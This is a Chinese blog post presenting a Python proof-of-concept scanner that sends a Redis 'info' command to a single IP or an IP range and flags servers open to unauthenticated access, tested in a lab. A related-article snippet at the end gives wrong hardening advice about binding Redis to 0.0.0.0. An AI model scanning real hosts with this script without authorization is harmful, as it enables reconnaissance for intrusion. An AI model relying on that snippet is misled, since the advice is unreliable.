Redis未授权访问漏洞验证脚本编写(POC)

最新推荐文章于 2024-05-07 15:15:00 发布
最新推荐文章于 2024-05-07 15:15:00 发布
阅读量1.3k 收藏 2
点赞数 3
分类专栏: 漏洞 复现 渗透 文章标签: redis 安全 渗透测试 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/115607739
版权
复现 同时被 3 个专栏收录
31 篇文章 3 订阅
订阅专栏
漏洞
7 篇文章 0 订阅
订阅专栏
渗透
3 篇文章 0 订阅
订阅专栏

Redis未授权访问漏洞验证脚本编写(POC)

1.实验环境:

Ubuntu18(靶机)
kali linux(攻击机)

2.代码的编写:


import sys
import getopt
import socket

def url_exec(url):#将要探测的主机地址都存入一个待测数组内
    ans = []
    group = []
    li = url.split(".")
    if (url.find('-') == -1):
        group.append(url)
        ans = group
    else:
        ans = url_list(li)
    return ans

def url_list(li):#如果带探测的ip地址是一个范围的话那么就放到这个函数中去执行
    ss = []
    i = 0
    j = 0
    ans = []
    for s in li:
        a = s.find('-')
        i = i + 1
        if a != -1:
            ss = s.rsplit("-")
            j = i
            break
    for s in range(int(ss[0]), int(ss[1]) + 1):
        li[j - 1] = str(s)
        aa = ".".join(li)
        ans.append(aa)
    return ans

def redis_unauthorized(url, port):#实际进行漏洞验证的脚本
    result = []
    s = socket.socket()
    payload = "\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a"#这个pyload是什么后面细说
    socket.setdefaulttimeout(10)
    for ip in url:
        try:
            s.connect((ip, int(port)))
            s.sendall(payload.encode())
            recvdata = s.recv(1024).decode()
            print(str(recvdata))
            if recvdata and 'redis_version' in recvdata:#用关键字进行检测漏洞
                result.append(str(ip) + ':' + str(port) + '     ' + 'succeed')
        except:
            pass
            result.append(str(ip) + ':' + str(port) + '     ' + 'failed')
    s.close()
    return result

def start(argv):#对脚本的传参进行判断
    url = ""
    type = "Redis"
    if len(sys.argv) < 2:
        print("-h 打印帮助信息;\n")
        sys.exit()
    try:
        banner()
        opts, argv = getopt.getopt(argv, "-u:-p:-h")
    except getopt.GetoptError:
        print("Error an argument!")
        sys.exit()
    for opt, arg in opts:
        if opt == '-u':
            url = arg
        elif opt == '-p':
            port = arg
        elif opt == '-h':
            usage()
    launcher(url, type, port)

def launcher(url,type,port):#脚本启动函数
    #未授权访问类型
    if type == "Redis":
        output = redis_unauthorized(url_exec(url),port)
        output_exec(output,type)

def banner():#作者的banner信息
    print("         #############################################")
    print("                         THE AUTHOR FUNCI")
    print("         #############################################")

def usage():#使用手册
    print("-h : 帮助")
    print("-u : 域名")
    print("-p : 端口")
    sys.exit()

def output_exec(output,type):#输出规范
    print("\033[1;32;40m" + type + "......\033[0m")
    print("++++++++++++++++++++++++++++++++++++++++++++++++")
    print("|         ip         |    port   |     status  |")
    for li in output:
        print("+-----------------+-----------+--------------+")
        print("|   " + li.replace(":", "   |    ") + "  | ")
    print("+----------------+------------+---------------+\n")
    print("[*] shutting down....")

if __name__ == '__main__':#主函数
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print("interrupted by user, killing all thread.....")

3.脚本执行效果:

在这里插入图片描述
在这里插入图片描述
试验成功,具体的实验环境配置看上一个博客的漏洞攻击实验

4.Payload由来:

我们在验证某一个靶机的Redis服务是否有未授权访问漏洞的时候,会向该靶机传入info命令来查看是否可以拿到该服务的详细信息。所以,我们现在需要了解的就是,如果我们向靶机传入info命令的时候,客户机发出的数据包的内容究竟是什么。我们通过抓包的方式就可以获得这个内容:

*1
$4
info

这就是数据包的实际发送内容,我上面的是我转十六进制之后的结果,不转的话似乎也可以,大家可以试试。下面附上一个抓取info命令数据的详细步骤的博客。

https://blog.csdn.net/lonely_feather/article/details/88076174

入山梵行
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5423
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
1.Redis授权访问
weixin_44616172的博客
06-01 322
把 #bind 127.0.0.1前面的注释#号去掉,然后把127.0.0.1改成你允许访问你的redis服务器的ip地址,表示只允许该ip进行访问,这种情况下,我们在启动redis服务器的时候不能再用:redis-server,改为:redis-server path/redis.conf 即在启动的时候指定需要加载的配置文件,其中path/是你上面修改的redis配置文件所在目录,这个方法有一点不太好,我难免有多台机器访问一个redis服务。这里没有密钥文件,我们直接在靶机上创建。
浅谈工作中celery与Redis遇到的一些问题
houmenghu的博客
10-09 808
https://www.cnblogs.com/Rglin/articles/10786317.html
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2379
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
拒绝做工具小子—编写Python漏洞验证脚本
最新发布
m0_61869253的博客
05-07 713
我们实战经常会遇到以下几个问题:​ 1、遇到一个利用步骤十分繁琐的漏洞,中间错一步就无法利用​ 2、挖到一个通用漏洞,想要批量刷洞小赚一波,但手动去测试每个网站工作量太大这个时候编写一个poc脚本将会将会减轻我们很多工作。本文将以编写一个高效通用的poc脚本为目的,学习一些必要的python知识,这周也是拒绝做工具小子努力学习的一周。
redis验证redis是否正常运行以及报错解决方案
一起加油吧
04-11 2718
如果您在应用程序中使用 Redis 客户端库(如 Jedis、StackExchange.Redis 等),则可以编写一个简单的程序来测试 Redis 是否能够正常工作。” 错误,意味着客户端尝试向 Redis 服务器发送命令,但提供身份验证或提供的身份验证信息不正确。如果已经进行了身份验证,但仍然出现此错误,请检查是否已正确输入了密码,并且密码是否与 Redis 配置文件中设置的一致。如果上述步骤无法解决问题,则可能需要进一步检查 Redis 的配置、网络等方面的问题。Redis 出现 “
python漏洞扫描器框架_Python3漏洞扫描工具 ( Python3 插件式框架 )
weixin_39722563的博客
12-10 220
目录Python3 漏洞检测工具 -- lancelance, a simple version of the vulnerability detection framework based on Python3.基于Python3的简单版漏洞检测框架 -- lance可以自定义poc或exp插件,可以 指定 要加载的poc或exp。再次添加了logging模块来控制输出,同时也支持Linux平台...
漏洞复现-速达软件全系产品存在任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 600
漏洞复现速达软件全系产品任意文件上传漏洞,附带自己写的poc脚本
POC批量验证Python脚本编写
hackzkaq的博客
05-06 3645
更多黑客技能 公众号:白帽子左一 作者:掌控安全- webdogc 编写目的 批量验证poc,Python代码练习。 需求分析 1、poc尽可能简单。 2、多线程。 3、联动fofa获取目标。 4、随机请求头. 实现过程 脚本分为三个模块,获取poc及目标、多线程批量请求验证、输出结果。其中批量请求验证包括构造多线程,修改请求参数,发送请求三个部分。 Main函数 在main函数中,主要有三个部分获取poc及目标,多线程(将目标填充到队列,创建多线程并启动)、输出结果。 具体实现如下: def mai
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 4903
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9365
redis授权访问漏洞
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
python脚本实现Redis授权批量提权
12-16
本文主要给大家介绍了关于redis授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: ...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauthPOC
09-29
Celery 4.0 Redis授权访问+Pickle反...Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。
Redis授权访问漏洞复现
weixin_56537388的博客
09-02 1028
这里上一个自动检测授权漏洞的工具,中间挺多坑的,作者提供的安装步骤有问题,修改了一下。Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。Redis 设置密码,客户端工具可以直接链接。Redis 设置密码,客户端工具可以直接链接。这里要导入redis,可能需要下载。容器的作者还提供了一个方法。这里修改了一下检测代码。可以看到,命令执行成功。Redis 简单使用。
redis授权访问批量验证脚本编写[python]
feather's blog
03-02 1273
本文将带领大家编写redis授权访问验证脚本
Redis授权漏洞复现
未完成的歌~的博客
05-10 1344
Redis是C语言开发的一个开源高性能(key-value)键值对类型的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀,支持持久化到硬盘且高可用)。由于其自身特点,可以广泛应用在数据集群,分布式队列,信息中间件等网络架构中,在内网渗透的突破中,常常扮演getshell的角色。
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值